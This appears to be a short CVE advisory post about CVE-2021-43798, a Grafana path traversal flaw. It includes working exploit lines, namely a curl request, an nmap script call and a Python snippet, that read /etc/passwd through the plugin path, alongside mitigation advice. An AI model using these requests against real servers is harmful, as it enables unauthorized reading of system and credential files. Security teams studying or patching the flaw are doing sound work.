Grafana, Directory Traversal, CVE-2021-43798 (High)

By /

Listen to this Post

The vulnerability CVE-2021-43798 is a path traversal flaw in Grafana’s static plugin handling. The issue resides in the URL path /public/plugins/, which is used to serve static assets for installed plugins. Grafana fails to properly sanitize the `pluginId` parameter within this path. An attacker can craft a malicious HTTP request using directory traversal sequences, such as ../../../, after a legitimate plugin ID. For example, a request to `/public/plugins/alertlist/../../../../../../etc/passwd` would bypass intended restrictions. This allows the attacker to read arbitrary files from the underlying server’s filesystem by manipulating the path to traverse outside the intended plugin directory. The vulnerability is network exploitable without authentication, leading to confidentiality loss as sensitive system files can be disclosed.
Platform: Grafana
Version: 8.0.0-8.3.0

Vulnerability : Directory Traversal

Severity: High

date: 2021-12

Prediction: Patch Available

What Undercode Say:

curl -path-as-is "http://vulnerable-host:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

nmap -p3000 --script http-vuln-cve2021-43798 <target>

import requests
url = 'http://<target>:3000/public/plugins/pluginID/../../../../etc/passwd'
r = requests.get(url)
print(r.text)

How Exploit:

Craft malicious HTTP request.

Use traversal sequences.

Read local files.

Protection from this CVE

Upgrade Grafana version.

Implement web application firewall.

Restrict network access.

Impact:

Arbitrary file read.

Information disclosure.

Sensitive data exposure.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: www.cve.org
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top